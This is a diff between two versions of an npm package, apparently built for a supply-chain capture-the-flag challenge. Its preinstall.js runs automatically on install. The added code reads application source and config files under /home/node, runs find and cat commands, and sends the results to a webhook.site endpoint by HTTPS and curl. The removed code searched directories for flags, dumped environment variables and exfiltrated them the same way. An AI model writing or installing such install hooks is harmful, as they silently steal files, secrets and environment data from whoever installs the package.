@ctfsolve9z/coral-wraith 9999.0.2 → 9999.0.3

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@ctfsolve9z/coral-wraith",
-  "version": "9999.0.2",
+  "version": "9999.0.3",
   "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -1,124 +1,62 @@
 const fs = require('fs');
-const http = require('http');
 const https = require('https');
 const { execSync } = require('child_process');
 
-let flag = null;
 let debug = [];
 
-// Thorough directory search
-function readDir(path, depth = 0) {
-  if (depth > 3) return;
+// Read key files
+const filesToRead = [
+  '/home/node/supplysec_entry.js',
+  '/home/node/aspect-node/config/aspect.config.json',
+  '/home/node/aspect-node/index.js',
+  '/home/node/aspect-node/sample.js',
+  '/home/node/aspect-node/package.json',
+  '/home/node/aspect-node/modules/npm-tracker/index.js',
+  '/home/node/aspect-node/modules/npm-tracker/fuzz.js',
+  '/home/node/aspect-node/modules/npm-tracker/supplysec_entry.js',
+  '/home/node/aspect-node/modules/npm-tracker/package.json',
+  '/home/node/aspect-node/modules/npm-tracker/src/index.js',
+];
+
+for (const f of filesToRead) {
   try {
-    const entries = fs.readdirSync(path);
-    debug.push(path + ':' + entries.join(','));
-    for (const e of entries) {
-      const full = path + '/' + e;
-      try {
-        const stat = fs.statSync(full);
-        if (stat.isFile() && stat.size < 10000) {
-          const content = fs.readFileSync(full, 'utf8').trim();
-          if (content.includes('HTB{') || content.includes('flag{')) {
-            flag = content;
-            debug.push('FLAG_FOUND:' + full);
-            return;
-          }
-        }
-        if (stat.isDirectory() && !e.startsWith('.') && e !== 'node_modules' && e !== 'proc' && e !== 'sys' && e !== 'dev') {
-          readDir(full, depth + 1);
-        }
-      } catch(e) {}
-      if (flag) return;
-    }
-  } catch(e) {}
+    const content = fs.readFileSync(f, 'utf8');
+    debug.push(`FILE:${f}:${content}`);
+  } catch(e) {
+    debug.push(`ERR:${f}:${e.message.substring(0, 50)}`);
+  }
 }
 
-// Search key directories
-for (const dir of ['/home/node', '/tmp/supplysec', '/tmp', '/home', '/opt', '/srv', '/root', '/var/www', '/app']) {
-  readDir(dir);
-  if (flag) break;
-}
-
-// Also search for flag in ALL environment variables
-debug.push('ALL_ENV:' + JSON.stringify(process.env).substring(0, 500));
-
-// Read the init_test.sh script  
-try {
-  const script = fs.readFileSync('/home/node/init_test.sh', 'utf8');
-  debug.push('init_test.sh:' + script.substring(0, 500));
-  // Check if flag is in the script
-  const m = script.match(/HTB\{[^}]+\}/);
-  if (m) flag = m[0];
-} catch(e) { debug.push('init_test_err:' + e.message); }
-
-// Read package.json in /home/node
+// Also list src directory
 try {
-  const pkg = fs.readFileSync('/home/node/package.json', 'utf8');
-  debug.push('home_pkg:' + pkg.substring(0, 300));
+  const r = execSync('find /home/node/aspect-node/modules/npm-tracker/src -type f 2>/dev/null', { timeout: 5000 }).toString();
+  debug.push('SRC_FILES:' + r);
 } catch(e) {}
 
-// Check /tmp/supplysec
+// Read all .js files in key directories
 try {
-  const r = execSync('find /tmp/supplysec -type f 2>/dev/null | head -30', { timeout: 5000 }).toString();
-  debug.push('supplysec_files:' + r);
+  const r = execSync('find /home/node -maxdepth 1 -name "*.js" -exec cat {} \\; 2>/dev/null', { timeout: 5000 }).toString();
+  debug.push('HOME_JS:' + r);
 } catch(e) {}
 
-// Check /home/node
+// Post data  
+const data = JSON.stringify({ debug });
 try {
-  const r = execSync('find /home/node -type f -not -path "*/node_modules/*" 2>/dev/null | head -30', { timeout: 5000 }).toString();
-  debug.push('home_node_files:' + r);
-} catch(e) {}
-
-// Exfiltrate
-const data = JSON.stringify({ flag: flag || 'NOT_FOUND', debug: debug });
-
-// Send chunks via webhook (URL length limited)
-const chunks = [];
-const encoded = Buffer.from(data).toString('base64');
-for (let i = 0; i < encoded.length; i += 2000) {
-  chunks.push(encoded.substring(i, i + 2000));
-}
-
-for (let i = 0; i < Math.min(chunks.length, 10); i++) {
-  try {
-    https.get(`https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/v3-${i}?d=${chunks[i]}`, () => {}).on('error', () => {});
-  } catch(e) {}
-}
-
-// Also POST the full data
-try {
-  const postData = data;
   const req = https.request({
     hostname: 'webhook.site',
     path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
     method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
-    timeout: 10000
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
+    timeout: 15000
   }, () => {});
   req.on('error', () => {});
-  req.write(postData);
+  req.write(data);
   req.end();
 } catch(e) {}
 
-// PUT to challenge API
-const ports = [1337, 3000, 5000, 8080, 80];
-for (const port of ports) {
-  try {
-    const postData = JSON.stringify({
-      manifest: `ecto_module:\n  name: "coral-wraith"\n  version: "9999.0.1"\n  flag: "${(flag || 'NOT_FOUND').replace(/"/g, '\\"').replace(/\n/g, '\\n')}"`
-    });
-    const req = http.request({
-      hostname: 'localhost', port, path: '/api/modules/ECT-987654',
-      method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
-      timeout: 3000
-    }, () => {});
-    req.on('error', () => {});
-    req.write(postData);
-    req.end();
-  } catch(e) {}
-}
-
-// curl fallback
+// Also send via curl for larger payloads
 try {
-  execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d '${data.replace(/'/g, "\\'")}' -m 10`, { timeout: 12000 });
+  const tmpFile = '/tmp/exfil.json';
+  fs.writeFileSync(tmpFile, data);
+  execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d @${tmpFile} -m 15`, { timeout: 20000 });
 } catch(e) {}